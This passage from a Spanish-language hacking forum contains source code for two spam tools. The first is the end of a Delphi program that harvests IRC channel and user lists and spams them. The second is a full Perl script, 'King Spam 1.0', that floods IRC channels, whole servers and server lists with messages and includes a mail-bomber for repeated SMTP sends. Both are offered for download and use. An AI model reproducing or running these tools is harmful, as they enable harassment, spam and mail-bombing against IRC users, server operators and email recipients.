  81.    procedure spam_usuariosTimer(Sender: TObject);
  82.    procedure Button11Click(Sender: TObject);
  83.    procedure Button6Click(Sender: TObject);
  84.    procedure FormCreate(Sender: TObject);
  85.  
  86.  private
  87.    { Private declarations }
  88.  public
  89.    { Public declarations }
  90.  end;
  91.  
  92. var
  93.  Form1: TForm1;
  94.  buscando_usuarios: string;
  95.  buscando_canales: string;
  96.  control_guardar_canales: string;
  97.  control_guardar_users: string;
  98.  
  99. implementation
  100.  
  101. {$R *.dfm}
  102. // Functions
  103.  
  104. procedure savefile(filename, texto: string);
  105. var
  106.  ar: TextFile;
  107.  
  108. begin
  109.  
  110.  AssignFile(ar, filename);
  111.  FileMode := fmOpenWrite;
  112.  
  113.  if FileExists(filename) then
  114.    Append(ar)
  115.  else
  116.    Rewrite(ar);
  117.  
  118.  Write(ar, texto + sLineBreak);
  119.  CloseFile(ar);
  120.  
  121. end;
  122.  
  123. procedure TForm1.Button11Click(Sender: TObject);
  124. begin
  125.  StatusBar1.Panels[0].Text := '[+] Finished';
  126.  StatusBar1.Update;
  127.  IdIRC1.Disconnect;
  128.  spam_usuarios.Enabled := false;
  129. end;
  130.  
  131. procedure TForm1.Button1Click(Sender: TObject);
  132. var
  133.  i: integer;
  134.  contenido: TStringList;
  135.  stream: TFileStream;
  136. begin
  137.  
  138.  file_spam.Clear;
  139.  
  140.  if OpenDialog1.Execute then
  141.  begin
  142.  
  143.    spam.Text := OpenDialog1.filename;
  144.  
  145.    contenido := TStringList.Create;
  146.    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
  147.    contenido.LoadFromStream(stream);
  148.  
  149.    for i := 0 to contenido.Count - 1 do
  150.    begin
  151.      file_spam.Items.Add(contenido[i]);
  152.    end;
  153.  end;
  154.  
  155. end;
  156.  
  157. procedure TForm1.Button2Click(Sender: TObject);
  158. var
  159.  seleccion: integer;
  160. begin
  161.  
  162.  canales.Items.Clear;
  163.  
  164.  buscando_canales := 'yes';
  165.  
  166.  seleccion := MessageDlg('Save Channels', mtInformation, mbYesNo, 0);
  167.  if seleccion = mrYes then
  168.  begin
  169.    control_guardar_canales := 'yes';
  170.  end;
  171.  
  172.  StatusBar1.Panels[0].Text := '[+] Searching channels ...';
  173.  StatusBar1.Update;
  174.  
  175.  // IdIRC1.Disconnect;
  176.  
  177.  IdIRC1.Nickname := nombre.Text;
  178.  IdIRC1.AltNickname := nombre.Text + '123';
  179.  IdIRC1.Username := nombre.Text;
  180.  IdIRC1.RealName := nombre.Text;
  181.  IdIRC1.Password := '';
  182.  IdIRC1.host := host.Text;
  183.  
  184.  try
  185.    begin
  186.      IdIRC1.Connect;
  187.      IdIRC1.Raw('LIST');
  188.    end;
  189.  except
  190.    begin
  191.      ShowMessage('Error connecting');
  192.    end;
  193.  end;
  194.  
  195.  if (FileExists(GetCurrentDir + '/logs/' + host.Text + '_canales.txt')) then
  196.  begin
  197.    ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + host.Text +
  198.      '_canales.txt'), nil, nil, SW_SHOWNORMAL);
  199.  end;
  200.  
  201. end;
  202.  
  203. procedure TForm1.Button3Click(Sender: TObject);
  204. var
  205.  seleccion: integer;
  206. begin
  207.  
  208.  users.Items.Clear;
  209.  
  210.  buscando_usuarios := 'yes';
  211.  
  212.  seleccion := MessageDlg('Save users', mtInformation, mbYesNo, 0);
  213.  if seleccion = mrYes then
  214.  begin
  215.    control_guardar_users := 'yes';
  216.  end;
  217.  
  218.  StatusBar1.Panels[0].Text := '[+] Searching users ...';
  219.  StatusBar1.Update;
  220.  
  221.  // IdIRC1.Disconnect;
  222.  
  223.  IdIRC1.Nickname := nombre.Text;
  224.  IdIRC1.AltNickname := nombre.Text + '123';
  225.  IdIRC1.Username := nombre.Text;
  226.  IdIRC1.RealName := nombre.Text;
  227.  IdIRC1.Password := '';
  228.  IdIRC1.host := host.Text;
  229.  
  230.  try
  231.    begin
  232.      IdIRC1.Connect;
  233.      IdIRC1.Join(canal.Text);
  234.    end;
  235.  except
  236.    begin
  237.      ShowMessage('Error connecting');
  238.    end;
  239.  end;
  240.  
  241.  if (FileExists(GetCurrentDir + '/logs/' + canal.Text + '_usuarios.txt')) then
  242.  begin
  243.    ShellExecute(Handle, 'open', Pchar(GetCurrentDir + '/logs/' + canal.Text +
  244.      '_usuarios.txt'), nil, nil, SW_SHOWNORMAL);
  245.  end;
  246.  
  247. end;
  248.  
  249. procedure TForm1.Button4Click(Sender: TObject);
  250. begin
  251.  lista_canales.Items.Add(canal_agregar.Text);
  252. end;
  253.  
  254. procedure TForm1.Button5Click(Sender: TObject);
  255. var
  256.  i: integer;
  257.  canal_z: string;
  258. begin
  259.  
  260.  StatusBar1.Panels[0].Text := '[+] Spamming channel ...';
  261.  StatusBar1.Update;
  262.  
  263.  console1.Clear;
  264.  try
  265.    begin
  266.      IdIRC1.Nickname := nombre.Text;
  267.      IdIRC1.AltNickname := nombre.Text + '123';
  268.      IdIRC1.Username := nombre.Text;
  269.      IdIRC1.RealName := nombre.Text;
  270.      IdIRC1.Password := '';
  271.      IdIRC1.host := host.Text;
  272.      IdIRC1.Connect;
  273.  
  274.      for i := 0 to lista_canales.Count - 1 do
  275.      begin
  276.        canal_z := lista_canales.Items[i];
  277.        IdIRC1.Join(canal_z);
  278.        console1.Lines.Add('[+] Spam in channel : ' + canal_z);
  279.        IdIRC1.Say(canal_z, file_spam.Items[Random(file_spam.Count - 1) + 0]);
  280.        Sleep(2000);
  281.        IdIRC1.Part(canal_z);
  282.        Sleep(2000);
  283.      end;
  284.    end;
  285.  except
  286.    ShowMessage('Error connecting');
  287.  end;
  288.  
  289.  IdIRC1.Disconnect;
  290.  
  291.  StatusBar1.Panels[0].Text := '[+] Finished';
  292.  StatusBar1.Update;
  293.  
  294. end;
  295.  
  296. procedure TForm1.Button6Click(Sender: TObject);
  297. begin
  298.  StatusBar1.Panels[0].Text := '[+] Spamming users ...';
  299.  StatusBar1.Update;
  300.  
  301.  IdIRC1.Nickname := nombre.Text;
  302.  IdIRC1.AltNickname := nombre.Text + '123';
  303.  IdIRC1.Username := nombre.Text;
  304.  IdIRC1.RealName := nombre.Text;
  305.  IdIRC1.Password := '';
  306.  IdIRC1.host := host.Text;
  307.  
  308.  try
  309.    begin
  310.      IdIRC1.Connect;
  311.      IdIRC1.Join(canal_spam_usuarios.Text);
  312.      spam_usuarios.Interval := 10000;
  313.      spam_usuarios.Enabled := true;
  314.    end;
  315.  except
  316.    begin
  317.      ShowMessage('Error connecting');
  318.    end;
  319.  end;
  320. end;
  321.  
  322. procedure TForm1.FormCreate(Sender: TObject);
  323. begin
  324.  
  325.  if not DirectoryExists('logs') then
  326.  begin
  327.    CreateDir('logs');
  328.  end;
  329.  
  330.  OpenDialog1.InitialDir := GetCurrentDir;
  331.  
  332. end;
  333.  
  334. procedure TForm1.IdIRC1Raw(ASender: TIdContext; AIn: Boolean;
  335.  const AMessage: string);
  336. var
  337.  code: string;
  338.  regex: TPerlRegEx;
  339.  otroregex: TPerlRegEx;
  340.  canales_encontrados: string;
  341.  control: TPerlRegEx;
  342.  otrocontrol: TPerlRegEx;
  343.  i: integer;
  344.  i2: integer;
  345.  renicks: string;
  346.  listanow: TStringList;
  347.  arraynow: array of String;
  348.  
  349. begin
  350.  code := AMessage;
  351.  
  352.  regex := TPerlRegEx.Create();
  353.  otroregex := TPerlRegEx.Create();
  354.  
  355.  // console1.Lines.Add(code);
  356.  
  357.  regex.regex := '322 (.*?) (.*?) (.*?) :';
  358.  regex.Subject := code;
  359.  
  360.  if regex.Match then
  361.  begin
  362.    canales_encontrados := regex.Groups[2];
  363.    canales.Items.Add(canales_encontrados);
  364.    if (control_guardar_canales = 'yes') then
  365.    begin
  366.      savefile('logs/' + host.Text + '_canales.txt', canales_encontrados);
  367.    end;
  368.  end;
  369.  
  370.  otroregex.regex := '353 (.*) = #(.*) :(.*)';
  371.  otroregex.Subject := code;
  372.  
  373.  if otroregex.Match then
  374.  begin
  375.  
  376.    renicks := otroregex.Groups[3];
  377.  
  378.    renicks := StringReplace(renicks, nombre.Text, '', []);
  379.  
  380.    listanow := TStringList.Create;
  381.    listanow.Delimiter := ' ';
  382.    listanow.DelimitedText := renicks;
  383.  
  384.    for i2 := 0 to listanow.Count - 1 do
  385.    begin
  386.      users.Items.Add(listanow[i2]);
  387.      if (control_guardar_users = 'yes') then
  388.      begin
  389.        savefile('logs/' + canal.Text + '_usuarios.txt', listanow[i2]);
  390.      end;
  391.    end;
  392.  end;
  393.  
  394.  control := TPerlRegEx.Create();
  395.  control.regex := 'End of /LIST';
  396.  control.Subject := code;
  397.  if control.Match then
  398.  begin
  399.    if (buscando_canales = 'yes') then
  400.    begin
  401.      ShowMessage('Channels Loaded');
  402.      StatusBar1.Panels[0].Text := '[+] Channels Found';
  403.      StatusBar1.Update;
  404.      regex.Free;
  405.      IdIRC1.Disconnect;
  406.      IdIRC1.Destroy;
  407.      buscando_canales := 'no';
  408.    end;
  409.  end;
  410.  
  411.  otrocontrol := TPerlRegEx.Create();
  412.  otrocontrol.regex := 'End of /NAMES';
  413.  otrocontrol.Subject := code;
  414.  if otrocontrol.Match then
  415.  begin
  416.    if (buscando_usuarios = 'yes') then
  417.    begin
  418.      ShowMessage('Users Loaded');
  419.      StatusBar1.Panels[0].Text := '[+] Users Found';
  420.      StatusBar1.Update;
  421.      otrocontrol.Free;
  422.      IdIRC1.Part(canal.Text);
  423.      IdIRC1.Disconnect;
  424.      IdIRC1.Destroy();
  425.      buscando_usuarios := 'no';
  426.    end;
  427.  end;
  428.  
  429. end;
  430.  
  431. procedure TForm1.L1Click(Sender: TObject);
  432. var
  433.  i: integer;
  434.  contenido: TStringList;
  435.  stream: TFileStream;
  436. begin
  437.  
  438.  if OpenDialog1.Execute then
  439.  begin
  440.    contenido := TStringList.Create;
  441.    stream := TFileStream.Create((OpenDialog1.filename), fmShareDenyNone);
  442.    contenido.LoadFromStream(stream);
  443.  
  444.    for i := 0 to contenido.Count - 1 do
  445.    begin
  446.      lista_canales.Items.Add(contenido[i]);
  447.    end;
  448.  end;
  449.  
  450. end;
  451.  
  452. procedure TForm1.R1Click(Sender: TObject);
  453. begin
  454.  lista_canales.Clear;
  455. end;
  456.  
  457. procedure TForm1.spam_usuariosTimer(Sender: TObject);
  458. var
  459.  i: integer;
  460. begin
  461.  
  462.  for i := 0 to users.Count - 1 do
  463.  begin
  464.  
  465.    StatusBar1.Panels[0].Text := '[+] Spamming to ' + users.Items[i];
  466.    StatusBar1.Update;
  467.  
  468.    console2.Lines.Add('[+] Spamming to ' + users.Items[i]);
  469.  
  470.    IdIRC1.Say(users.Items[i],
  471.      file_spam.Items[Random(file_spam.Count - 1) + 0]);
  472.  
  473.  end;
  474.  
  475. end;
  476.  
  477. end.
  478.  
  479. // The End ?
  480.  

Si lo quieren bajar lo pueden hacer de aca
7  Programación / Scripting / [Perl] King Spam 1.0 en: 15 Mayo 2015, 18:25
Un simple script en Perl para hacer spam en canales IRC y correos.

Tiene las siguientes opciones :

  • Spammear un canal normalmente o por siempre
  • Spammear un servidor entero
  • Spammear una lista de servidores y todos sus canales
  • Poder elegir un nick para el bot y un timeout
  • Permite spammear cuentas de correo

El codigo :

Código
  1. #!usr/bin/perl
  2. #King Spam 1.0
  3. #(C) Doddy Hackman 2015
  4. # SMTP Servers
  5. #smtp.gmail.com - 465
  6. #smtp.mail.yahoo.com -587
  7.  
  8. use IO::Socket;
  9. use Color::Output;
  10. Color::Output::Init;
  11. use Getopt::Long;
  12.  
  13. #use Win32::OLE;
  14.  
  15. my $nick_secundario    = "Cl4ptr4p";
  16. my $timeout_secundario = "5";
  17.  
  18. GetOptions(
  19.    "get_channels=s"         => \$get_channels,
  20.    "get_users=s"            => \$get_users,
  21.    "spam_channel=s"         => \$spam_channel,
  22.    "spam_channel_forever=s" => \$spam_channel_forever,
  23.    "spam_server=s"          => \$spam_server,
  24.    "spam_servers_file=s"    => \$spam_servers_file,
  25.    "spam_targets=s"         => \$spam_targets,
  26.    "spam_file=s"            => \$spam_file,
  27.    "channel=s"              => \$channel,
  28.    "port=s"                 => \$port,
  29.    "nick=s"                 => \$nick,
  30.    "savefile=s"             => \$file,
  31.    "timeout=s"              => \$timeout,
  32.    "mailbomber"             => \$mailbomber
  33. );
  34.  
  35. head();
  36.  
  37. if ($get_channels) {
  38.  
  39.    my $port_now = "";
  40.    my $nick_now = "";
  41.    my $file_now = "";
  42.  
  43.    if ( !$port ) {
  44.        $port_now = "6667";
  45.    }
  46.    else {
  47.        $port_now = $port;
  48.    }
  49.  
  50.    if ( !$nick ) {
  51.        $nick_now = $nick_secundario;
  52.    }
  53.    else {
  54.        $nick_now = $nick;
  55.    }
  56.  
  57.    if ( !$file ) {
  58.        $file_now = "";
  59.    }
  60.    else {
  61.        $file_now = $file;
  62.    }
  63.  
  64.    listar_canales( $get_channels, $port_now, $nick_now, $file_now );
  65.  
  66. }
  67. elsif ($get_users) {
  68.  
  69.    my $port_now = "";
  70.    my $nick_now = "";
  71.    my $file_now = "";
  72.  
  73.    if ( !$port ) {
  74.        $port_now = "6667";
  75.    }
  76.    else {
  77.        $port_now = $port;
  78.    }
  79.  
  80.    if ( !$nick ) {
  81.        $nick_now = $nick_secundario;
  82.    }
  83.    else {
  84.        $nick_now = $nick;
  85.    }
  86.  
  87.    printear_titulo("[+] Serching users ...\n\n");
  88.  
  89.    my @usuarios =
  90.      buscar_usuarios( $get_users, $port_now, $nick_now, $channel );
  91.  
  92.    if ( int(@usuarios) eq "0" ) {
  93.        printear("[-] Users not found\n");
  94.    }
  95.    else {
  96.        printear("[+] Users Found : ");
  97.        print int(@usuarios) . "\n\n";
  98.        for my $usuario (@usuarios) {
  99.            printear("[+] User : ");
  100.            print $usuario. "\n";
  101.            savefile( $file, $usuario );
  102.        }
  103.    }
  104.  
  105. }
  106. elsif ($spam_channel) {
  107.  
  108.    my $port_now    = "";
  109.    my $nick_now    = "";
  110.    my $timeout_now = "";
  111.  
  112.    if ( !$port ) {
  113.        $port_now = "6667";
  114.    }
  115.    else {
  116.        $port_now = $port;
  117.    }
  118.  
  119.    if ( !$nick ) {
  120.        $nick_now = $nick_secundario;
  121.    }
  122.    else {
  123.        $nick_now = $nick;
  124.    }
  125.  
  126.    if ( !$timeout ) {
  127.        $timeout_now = $timeout_secundario;
  128.    }
  129.    else {
  130.        $timeout_now = $timeout;
  131.    }
  132.  
  133.    spam_canal(
  134.        $spam_channel, $port_now,  $nick_now,
  135.        $channel,      $spam_file, $timeout_now
  136.    );
  137.  
  138. }
  139. elsif ($spam_channel_forever) {
  140.  
  141.    my $port_now    = "";
  142.    my $nick_now    = "";
  143.    my $timeout_now = "";
  144.  
  145.    if ( !$port ) {
  146.        $port_now = "6667";
  147.    }
  148.    else {
  149.        $port_now = $port;
  150.    }
  151.  
  152.    if ( !$nick ) {
  153.        $nick_now = $nick_secundario;
  154.    }
  155.    else {
  156.        $nick_now = $nick;
  157.    }
  158.  
  159.    if ( !$timeout ) {
  160.        $timeout_now = $timeout_secundario;
  161.    }
  162.    else {
  163.        $timeout_now = $timeout;
  164.    }
  165.  
  166.    spam_canal_forever( $spam_channel_forever, $port_now, $nick_now,
  167.        $channel, $spam_file, $timeout_now );
  168.  
  169. }
  170. elsif ($spam_server) {
  171.  
  172.    my $port_now    = "";
  173.    my $nick_now    = "";
  174.    my $timeout_now = "";
  175.  
  176.    if ( !$port ) {
  177.        $port_now = "6667";
  178.    }
  179.    else {
  180.        $port_now = $port;
  181.    }
  182.  
  183.    if ( !$nick ) {
  184.        $nick_now = $nick_secundario;
  185.    }
  186.    else {
  187.        $nick_now = $nick;
  188.    }
  189.  
  190.    if ( !$timeout ) {
  191.        $timeout_now = $timeout_secundario;
  192.    }
  193.    else {
  194.        $timeout_now = $timeout;
  195.    }
  196.  
  197.    my @encontrados = buscar_canales( $spam_server, $port_now, $nick_now );
  198.  
  199.    for my $encontrado (@encontrados) {
  200.        if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
  201.            my $canal    = $1;
  202.            my $cantidad = $2;
  203.  
  204.            spam_canal( $spam_server, $port_now, $nick_now, $canal, $spam_file,
  205.                $timeout_now );
  206.  
  207.        }
  208.    }
  209.  
  210. }
  211. elsif ($spam_servers_file) {
  212.  
  213.    my $port_now    = "";
  214.    my $nick_now    = "";
  215.    my $timeout_now = "";
  216.  
  217.    if ( !$port ) {
  218.        $port_now = "6667";
  219.    }
  220.    else {
  221.        $port_now = $port;
  222.    }
  223.  
  224.    if ( !$nick ) {
  225.        $nick_now = $nick_secundario;
  226.    }
  227.    else {
  228.        $nick_now = $nick;
  229.    }
  230.  
  231.    if ( !$timeout ) {
  232.        $timeout_now = $timeout_secundario;
  233.    }
  234.    else {
  235.        $timeout_now = $timeout;
  236.    }
  237.  
  238.    unless ( -f $spam_servers_file ) {
  239.        printear("[-] File not found\n\n");
  240.        copyright();
  241.    }
  242.    else {
  243.  
  244.        my @lista = loadfile($spam_servers_file);
  245.  
  246.        printear("[+] Servers Found : ");
  247.        print int(@lista) . "\n";
  248.  
  249.        printear_titulo(
  250.            "\n-------------------------------------------------------------\n"
  251.        );
  252.  
  253.        for my $spam_server (@lista) {
  254.            chomp $spam_server;
  255.            my @encontrados =
  256.              buscar_canales( $spam_server, $port_now, $nick_now );
  257.  
  258.            for my $encontrado (@encontrados) {
  259.                chomp $encontrado;
  260.                if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
  261.                    my $canal    = $1;
  262.                    my $cantidad = $2;
  263.  
  264.                    spam_canal( $spam_server, $port_now, $nick_now, $canal,
  265.                        $spam_file, $timeout_now );
  266.                    printear_titulo(
  267. "\n-------------------------------------------------------------\n"
  268.                    );
  269.                }
  270.            }
  271.        }
  272.    }
  273.  
  274. }
  275. elsif ($spam_targets) {
  276.  
  277.    my $port_now    = "";
  278.    my $nick_now    = "";
  279.    my $timeout_now = "";
  280.  
  281.    if ( !$port ) {
  282.        $port_now = "6667";
  283.    }
  284.    else {
  285.        $port_now = $port;
  286.    }
  287.  
  288.    if ( !$nick ) {
  289.        $nick_now = $nick_secundario;
  290.    }
  291.    else {
  292.        $nick_now = $nick;
  293.    }
  294.  
  295.    if ( !$timeout ) {
  296.        $timeout_now = $timeout_secundario;
  297.    }
  298.    else {
  299.        $timeout_now = $timeout;
  300.    }
  301.  
  302.    if ( -f $spam_targets ) {
  303.  
  304.        my @datos = loadfile($spam_targets);
  305.  
  306.        printear("[+] Servers Found : ");
  307.        print int(@datos) . "\n";
  308.  
  309.        printear_titulo(
  310.            "\n-------------------------------------------------------------\n"
  311.        );
  312.  
  313.        for my $dato (@datos) {
  314.            chomp $dato;
  315.            if ( $dato =~ /(.*) --- (.*)/ ) {
  316.                my $server = $1;
  317.                my $canal  = $2;
  318.  
  319.                spam_canal( $server, $port_now, $nick_now, $canal, $spam_file,
  320.                    $timeout_now );
  321.                printear_titulo(
  322. "\n-------------------------------------------------------------\n"
  323.                );
  324.  
  325.            }
  326.        }
  327.  
  328.    }
  329.    else {
  330.        printear("\n[-] File not Found\n\n");
  331.        copyright();
  332.    }
  333.  
  334. }
  335. elsif ($mailbomber) {
  336.  
  337.    printear_titulo("[+] Spam Mails : OK\n\n\n");
  338.  
  339.    printear("[+] Host : ");
  340.    chomp( my $host = <stdin> );
  341.  
  342.    printear("\n[+] Port : ");
  343.    chomp( my $puerto = <stdin> );
  344.  
  345.    printear("\n[+] Username : ");
  346.    chomp( my $username = <stdin> );
  347.  
  348.    printear("\n[+] Password : ");
  349.    chomp( my $password = <stdin> );
  350.  
  351.    printear("\n[+] Count Message : ");
  352.    chomp( my $count = <stdin> );
  353.  
  354.    printear("\n[+] To : ");
  355.    chomp( my $to = <stdin> );
  356.  
  357.    printear("\n[+] Subject : ");
  358.    chomp( my $asunto = <stdin> );
  359.  
  360.    printear("\n[+] Body : ");
  361.    chomp( my $body = <stdin> );
  362.  
  363.    printear("\n[+] File to Send : ");
  364.    chomp( my $file = <stdin> );
  365.  
  366.    printear_titulo("\n[+] Starting ...\n\n");
  367.  
  368.    for my $num ( 1 .. $count ) {
  369.        printear("[+] Sending Message : ");
  370.        print "$num\n";
  371.        sendmail(
  372.            $host,     $puerto, $username, $password, $username, $username,
  373.            $username, $to,     $asunto,   $body,     $file
  374.        );
  375.    }
  376.  
  377.    printear_titulo("\n[+] Finished\n");
  378.  
  379. }
  380. else {
  381.    sintax();
  382. }
  383.  
  384. copyright();
  385.  
  386. # Functions
  387.  
  388. sub spam_canal {
  389.  
  390.    my $hostname = $_[0];
  391.    my $port     = $_[1];
  392.    my $nombre   = $_[2];
  393.    my $canal    = $_[3];
  394.    my $archivo  = $_[4];
  395.  
  396.    printear("[+] Connecting to ");
  397.    print $hostname. "\n\n";
  398.  
  399.    my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
  400.    my $contador = 0;
  401.    my $termine  = 0;
  402.    my $timeout  = $_[5];
  403.  
  404.    my @spamnow = loadfile($archivo);
  405.  
  406.    if (
  407.        my $socket = new IO::Socket::INET(
  408.            PeerAddr => $hostname,
  409.            PeerPort => $port,
  410.            Proto    => "tcp"
  411.        )
  412.      )
  413.    {
  414.  
  415.        print $socket "NICK $nombre\r\n";
  416.        print $socket "USER $nombre 1 1 1 1\r\n";
  417.        print $socket "JOIN $canal\r\n";
  418.  
  419.        printear_titulo("[+] Users Found : ");
  420.        print int(@nicks) . "\n\n";
  421.  
  422.        while ( my $log = <$socket> ) {
  423.            chomp $log;
  424.  
  425.            if ( $log =~ /^PING(.*)$/i ) {
  426.                print $socket "PONG $1\r\n";
  427.            }
  428.  
  429.            if ( $contador eq "0" ) {
  430.                printear("[+] Spam in channel : ");
  431.                print $canal. "\n";
  432.                sleep($timeout);
  433.                print $socket "PRIVMSG $canal "
  434.                  . $spamnow[ rand(@spamnow) ] . "\r\n";
  435.                $contador++;
  436.            }
  437.  
  438.            foreach $names (@nicks) {
  439.                chomp $names;
  440.                sleep($timeout);
  441.                unless ( $nombre eq $names ) {
  442.                    $names =~ s/\@//;
  443.                    $names =~ s/\+//;
  444.                    print $socket "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
  445.                    printear("[+] Spam to user $names : ");
  446.                    print "OK\n";
  447.                }
  448.                $termine++;
  449.            }
  450.  
  451.            if ( $termine eq int(@nicks) ) {
  452.                $socket->close();
  453.                last;
  454.            }
  455.  
  456.        }
  457.    }
  458.    else {
  459.        printear("[-] Error\n");
  460.        $socket->close();
  461.    }
  462.  
  463. }
  464.  
  465. sub spam_canal_forever {
  466.  
  467.    my $hostname = $_[0];
  468.    my $port     = $_[1];
  469.    my $nombre   = $_[2];
  470.    my $canal    = $_[3];
  471.    my $archivo  = $_[4];
  472.  
  473.    printear("[+] Connecting to ");
  474.    print $hostname. "\n\n";
  475.  
  476.    my @nicks    = buscar_usuarios( $_[0], $_[1], $_[2], $_[3] );
  477.    my $contador = 0;
  478.    my $termine  = 0;
  479.    my $timeout  = $_[5];
  480.  
  481.    my @spamnow = loadfile($archivo);
  482.  
  483.    if (
  484.        my $socket = new IO::Socket::INET(
  485.            PeerAddr => $hostname,
  486.            PeerPort => $port,
  487.            Proto    => "tcp"
  488.        )
  489.      )
  490.    {
  491.  
  492.        print $socket "NICK $nombre\r\n";
  493.        print $socket "USER $nombre 1 1 1 1\r\n";
  494.        print $socket "JOIN $canal\r\n";
  495.  
  496.        printear_titulo("[+] Users Found : ");
  497.        print int(@nicks) . "\n\n";
  498.  
  499.        while ( my $log = <$socket> ) {
  500.            chomp $log;
  501.  
  502.            while (1) {
  503.                if ( $log =~ /^PING(.*)$/i ) {
  504.                    print $socket "PONG $1\r\n";
  505.                }
  506.  
  507.                if ( $contador eq "0" ) {
  508.                    printear("[+] Spam in channel : ");
  509.                    print $canal. "\n";
  510.                    sleep($timeout);
  511.                    print $socket "PRIVMSG $canal "
  512.                      . $spamnow[ rand(@spamnow) ] . "\r\n";
  513.                    $contador++;
  514.                }
  515.  
  516.                foreach $names (@nicks) {
  517.                    chomp $names;
  518.                    sleep($timeout);
  519.                    unless ( $nombre eq $names ) {
  520.                        $names =~ s/\@//;
  521.                        $names =~ s/\+//;
  522.                        print $socket
  523.                          "PRIVMSG $names $spamnow[rand(@spamnow)]\r\n";
  524.                        printear("[+] Spam to user $names : ");
  525.                        print "OK\n";
  526.                    }
  527.                    $termine++;
  528.                }
  529.                $contador = 0;
  530.                print "\n";
  531.            }
  532.  
  533.            if ( $termine eq int(@nicks) ) {
  534.                $socket->close();
  535.                last;
  536.            }
  537.  
  538.        }
  539.    }
  540.    else {
  541.        printear("[-] Error\n");
  542.        $socket->close();
  543.    }
  544.  
  545. }
  546.  
  547. sub buscar_usuarios {
  548.  
  549.    my $hostname = $_[0];
  550.    my $port     = $_[1];
  551.    my $nombre   = $_[2];
  552.    my $canal    = $_[3];
  553.  
  554.    if (
  555.        my $socket = new IO::Socket::INET(
  556.            PeerAddr => $hostname,
  557.            PeerPort => $port,
  558.            Proto    => "tcp"
  559.        )
  560.      )
  561.    {
  562.  
  563.        print $socket "NICK $nombre\r\n";
  564.        print $socket "USER $nombre 1 1 1 1\r\n";
  565.        print $socket "JOIN $canal\r\n";
  566.  
  567.        while ( my $log = <$socket> ) {
  568.  
  569.            chomp $log;
  570.  
  571.            if ( $log =~ /^PING(.*)$/i ) {
  572.                print $socket "PONG $1\r\n";
  573.            }
  574.  
  575.            if ( $log =~ m/:(.*) 353 (.*) = (.*) :(.*)/ig ) {
  576.                my $pro = $4;
  577.                chop $pro;
  578.                $pro =~ s/$nombre//;
  579.                my @nicks = split " ", $pro;
  580.                $socket->close();
  581.                return @nicks;
  582.            }
  583.  
  584.        }
  585.    }
  586. }
  587.  
  588. sub buscar_canales {
  589.  
  590.    my @resultado;
  591.  
  592.    my $hostname = $_[0];
  593.    my $port     = $_[1];
  594.    my $nombre   = $_[2];
  595.  
  596.    if (
  597.        my $socket = new IO::Socket::INET(
  598.            PeerAddr => $hostname,
  599.            PeerPort => $port,
  600.            Proto    => "tcp"
  601.        )
  602.      )
  603.    {
  604.  
  605.        print $socket "NICK $nombre\r\n";
  606.        print $socket "USER $nombre 1 1 1 1\r\n";
  607.        print $socket "LIST\r\n";
  608.  
  609.        while ( my $log = <$socket> ) {
  610.  
  611.            if ( $log =~ /322 (.*?) (.*?) (.*?) :/ ) {
  612.                my $canal    = $2;
  613.                my $cantidad = $3;
  614.                push( @resultado, $canal . "-soy_un_limite-" . $cantidad );
  615.            }
  616.  
  617.            if ( $log =~ /:End of \/LIST/ ) {
  618.                last;
  619.            }
  620.  
  621.        }
  622.  
  623.        $socket->close;
  624.  
  625.        return @resultado;
  626.  
  627.    }
  628.  
  629. }
  630.  
  631. sub listar_canales {
  632.  
  633.    my $host = $_[0];
  634.    my $port = $_[1];
  635.    my $nick = $_[2];
  636.    my $file = $_[3];
  637.  
  638.    printear_titulo("[+] Serching channels ...\n\n");
  639.    my @encontrados = buscar_canales( $host, $port, $nick );
  640.    if ( int(@encontrados) eq "0" or int(@encontrados) eq "1" ) {
  641.        printear_titulo("[-] Channels not found\n");
  642.    }
  643.    else {
  644.        printearf_titulo( "Channels", "Users" );
  645.        print "\n";
  646.        for my $encontrado (@encontrados) {
  647.            if ( $encontrado =~ /(.*)-soy_un_limite-(.*)/ ) {
  648.                my $canal    = $1;
  649.                my $cantidad = $2;
  650.                printearf( $canal, $cantidad );
  651.  
  652.                if ( $file ne "" ) {
  653.                    savefile( $file, $canal );
  654.                }
  655.  
  656.            }
  657.        }
  658.    }
  659.  
  660. }
  661.  
  662. sub sendmail {
  663.  
  664. ## Function Based on : http://code.activestate.com/lists/pdk/5351/
  665. ## Credits : Thanks to Phillip Richcreek and Eric Promislow
  666.  
  667.    my (
  668.        $host, $port, $username, $password, $from, $cc,
  669.        $bcc,  $to,   $asunto,   $mensaje,  $file
  670.    ) = @_;
  671.  
  672.    $correo = Win32::OLE->new('CDO.Message');
  673.  
  674.    $correo->Configuration->Fields->SetProperty( "Item",
  675.        'http://schemas.microsoft.com/cdo/configuration/sendusername',
  676.        $username );
  677.    $correo->Configuration->Fields->SetProperty( "Item",
  678.        'http://schemas.microsoft.com/cdo/configuration/sendpassword',
  679.        $password );
  680.    $correo->Configuration->Fields->SetProperty( "Item",
  681.        'http://schemas.microsoft.com/cdo/configuration/smtpserver', $host );
  682.    $correo->Configuration->Fields->SetProperty( "Item",
  683.        'http://schemas.microsoft.com/cdo/configuration/smtpserverport',
  684.        $port );
  685.    $correo->Configuration->Fields->SetProperty( "Item",
  686.        'http://schemas.microsoft.com/cdo/configuration/smtpusessl', 1 );
  687.    $correo->Configuration->Fields->SetProperty( "Item",
  688.        'http://schemas.microsoft.com/cdo/configuration/sendusing', 2 );
  689.    $correo->Configuration->Fields->SetProperty( "Item",
  690.        'http://schemas.microsoft.com/cdo/configuration/smtpauthenticate', 1 );
  691.    $correo->Configuration->Fields->Update();
  692.  
  693.    if ( -f $file ) {
  694.        $correo->AddAttachment($file);
  695.    }
  696.  
  697.    $correo->{From}     = $from;
  698.    $correo->{CC}       = $cc;
  699.    $correo->{BCC}      = $bcc;
  700.    $correo->{To}       = $to;
  701.    $correo->{Subject}  = $asunto;
  702.    $correo->{TextBody} = $mensaje;
  703.    $correo->Send();
  704.  
  705. }
  706.  
  707. # More Functions
  708.  
  709. sub printearf_titulo {
  710.    cprintf( "\x0310" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
  711. }
  712.  
  713. sub printearf {
  714.    cprintf( "\x036" . "%-32s  %s" . "\x030\n", $_[0], $_[1] );
  715. }
  716.  
  717. sub printear {
